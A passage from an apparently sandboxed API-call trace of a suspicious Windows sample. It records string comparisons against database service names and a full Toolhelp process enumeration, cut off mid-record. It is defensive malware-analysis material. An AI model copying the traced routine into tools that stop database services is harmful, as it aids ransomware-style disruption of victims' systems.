(lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0211.647] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0211.647] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0211.647] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3f4 [0211.651] Process32FirstW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.652] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.653] lstrlenW (lpString="System") returned 6 [0211.653] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.654] lstrlenW (lpString="smss.exe") returned 8 [0211.654] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.654] lstrlenW (lpString="csrss.exe") returned 9 [0211.654] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.655] lstrlenW (lpString="wininit.exe") returned 11 [0211.655] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.656] lstrlenW (lpString="csrss.exe") returned 9 [0211.656] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.657] lstrlenW (lpString="winlogon.exe") returned 12 [0211.657] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.657] lstrlenW (lpString="services.exe") returned 12 [0211.658] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.658] lstrlenW (lpString="lsass.exe") returned 9 [0211.658] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.659] lstrlenW (lpString="svchost.exe") returned 11 [0211.659] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0211.660] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0211.660] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0211.660] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0211.660] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.661] lstrlenW (lpString="svchost.exe") returned 11 [0211.661] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0211.662] lstrlenW (lpString="dwm.exe") returned 7 [0211.662] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.663] lstrlenW (lpString="svchost.exe") returned 11 [0211.663] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.663] lstrlenW (lpString="svchost.exe") returned 11 [0211.663] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.664] lstrlenW (lpString="svchost.exe") returned 11 [0211.664] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.665] lstrlenW (lpString="svchost.exe") returned 11 [0211.665] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.666] lstrlenW (lpString="svchost.exe") returned 11 [0211.667] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.667] lstrlenW (lpString="svchost.exe") returned 11 [0211.667] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.668] lstrlenW (lpString="svchost.exe") returned 11 [0211.668] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.669] lstrlenW (lpString="svchost.exe") returned 11 [0211.669] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.670] lstrlenW (lpString="svchost.exe") returned 11 [0211.670] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0211.671] lstrlenW (lpString="spoolsv.exe") returned 11 [0211.671] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.671] lstrlenW (lpString="svchost.exe") returned 11 [0211.671] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.672] lstrlenW (lpString="svchost.exe") returned 11 [0211.672] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.673] lstrlenW (lpString="audiodg.exe") returned 11 [0211.673] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0211.674] lstrlenW (lpString="sihost.exe") returned 10 [0211.674] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.674] lstrlenW (lpString="svchost.exe") returned 11 [0211.674] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0211.675] lstrlenW (lpString="taskhostw.exe") returned 13 [0211.675] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0211.676] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0211.676] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0211.677] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0211.677] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.678] lstrlenW (lpString="explorer.exe") returned 12 [0211.678] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0211.678] lstrlenW (lpString="Memory Compression") returned 18 [0211.678] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0211.679] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0211.679] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0211.680] lstrlenW (lpString="SearchUI.exe") returned 12 [0211.680] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0211.681] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0211.681] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.681] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0211.681] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0211.682] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0211.682] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0211.683] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0211.683] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0211.684] lstrlenW (lpString="conhost.exe") returned 11 [0211.684] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0211.684] lstrlenW (lpString="roof competitive.exe") returned 20 [0211.684] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0211.685] lstrlenW (lpString="trustees.exe") returned 12 [0211.685] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0211.686] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0211.686] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0211.687] lstrlenW (lpString="isbn.exe") returned 8 [0211.687] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0211.688] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0211.688] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0211.688] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0211.688] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0211.689] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0211.689] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0211.690] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0211.690] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0211.690] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0211.691] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0211.691] lstrlenW (lpString="playstation iraq.exe") returned 20 [0211.691] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0211.692] lstrlenW (lpString="harbor.exe") returned 10 [0211.692] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0211.693] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0211.693] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0211.693] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0211.693] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0211.694] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0211.694] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0211.695] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0211.695] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0211.696] lstrlenW (lpString="larent.exe") returned 10 [0211.696] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0211.696] lstrlenW (lpString="stereo.exe") returned 10 [0211.696] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0211.698] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0211.698] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0211.699] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0211.699] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0211.700] lstrlenW (lpString="state.exe") returned 9 [0211.700] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0211.701] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0211.701] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0211.701] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0211.702] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0211.702] lstrlenW (lpString="taskhostw.exe") returned 13 [0211.702] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0211.703] lstrlenW (lpString="sppsvc.exe") returned 10 [0211.703] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0211.704] lstrlenW (lpString="svchost.exe") returned 11 [0211.704] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0211.705] lstrlenW (lpString="Pg.exe") returned 6 [0211.705] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0211.706] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0211.706] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0211.706] lstrlenW (lpString="conhost.exe") returned 11 [0211.706] Process32NextW (in: hSnapshot=0x3f4, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, 